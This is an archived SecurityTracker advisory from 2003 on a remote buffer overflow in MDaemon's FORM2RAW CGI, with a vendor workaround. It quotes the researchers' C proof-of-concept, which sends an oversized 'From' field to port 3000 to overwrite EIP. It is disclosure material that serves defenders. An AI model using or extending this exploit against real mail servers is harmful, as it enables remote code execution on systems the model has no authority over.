Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
MDaemon FORM2RAW Buffer Overflow Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1008572 |
|
SecurityTracker URL: http://securitytracker.com/id/1008572
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 29 2003
|
Impact:
Execution of arbitrary code via network, User access via network
|
Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 6.52 - 6.85
|
Description:
Hat-Squad Security Team reported a buffer overflow vulnerability in the MDaemon mail server in the Form2Raw component. A remote user can cause arbitrary code to be executed.
The report indicates that the Raw Message Handler (FORM2RAW.exe) CGI code contains an exploitable buffer overflow. A remote user with access to the web interface can inject more than 153 bytes in the "From" field to cause the CGI code to create a Raw Message file that will trigger a stack overflow in mdaemon.
The vulnerable FORM2RAW.exe is reportedly accessible by default from the WorldClient web server that listens on Port 3000.
A demonstration exploit is provided in the Source Message.
|
Impact:
A remote user can cause arbitrary code to be executed by MDaemon with the privileges of the mail server.
|
Solution:
The vendor is reportedly working on a fix. As a workaround, the vendor reports that you can disable the vulnerable Form2Raw code as follows:
To disable FORM2RAW open the \MDaemon\WorldClient\WorldClient.ini file with Notepad and delete the following two lines:
CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
Afterward, restart WorldClient to register the change.
|
Vendor URL: www.altn.com/Products/Default.asp?product_id=MDaemon (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 29 Dec 2003 19:57:21 -0000
Subject: [Hat-Squad] Remote buffer overflow in Mdaemon Raw message Handler
|
Hat-Squad Security Team Advisory
http://www.hat-squad.com
Product: Alt-N Technologies Mdaemon Mail Server
Version: MDaemon 6.85 and Below to 6.52
Vulnerability: Remote buffer overflow in Raw Message Handler
Release Date: 12/29/2003
Vendor Status:
Informed on 29 Dec 2003
Quick response on 29 Dec 2003
Overview:
FORM2RAW.exe is a CGI which allows users to send email using MDaemon from a web. It processes the fields of an HTML form and creates
a RAW message File in the Raw queue Directory of MDaemon mail server. This file then will be proccessed and qeued for delivery by
MDaemon.
According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed
in the 'from' tag (see below) is a valid account on the MDaemon server.If you want to disable this behavior you can set the FromCheck=No
in FORM2RAW.INI file".
Problem:
Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a Raw File that when proccessed by mdaemon will cause a Stack
buffer overflow.The EIP register will be overwritten when From Field length was 249 bytes.
The FORM2RAW.exe is accessible by default from WorlClient Web server listening on Port 3000.
---------------------Exploit:
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160
#define PORT 3000
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);
printf("%d",argc);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(PORT);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char buffer[500];
int i;
memset(buffer,0,sizeof(buffer));
strcpy(buffer,"get /form2raw.cgi?From=");
for(i=0;i<244;i++) {
strcat(buffer,"a");
}
strcat(buffer,"bbbb"); //Overwrites EIP
strcat(buffer,"c"); //One byte left after ESP :-(
strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");
send(s, buffer, strlen(buffer), 0);
printf("Exploit Sent.");
}
else printf("Error Connecting to The Target.\n");
closesocket(s);
}
WSACleanup();
}
---------------------------------------
Vendor Response:
Robin Edwards <support@helpdesk.altn.com> Wrote:
We have had a similar vulnerability report with Form2Raw and hope to release a patch soon. In the meantime it is easy to disable
Form2Raw by following the instructions below:
-----
To disable FORM2RAW open the
\MDaemon\WorldClient\WorldClient.ini file with Notepad and
delete the following two lines:
CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
Afterward, restart WorldClient to register the change.
-----
Credits:
This Vulnerability has been Discoverd By Pejamn Davarzani (pejman@hat-squad.com) and Behrang Fouladi(behrang@hat-squad.com)
Original advisory could be found at:
http://hat-squad.com/bugreport/mdaemon-raw.txt
|
|
Go to the Top of This SecurityTracker Archive Page
|
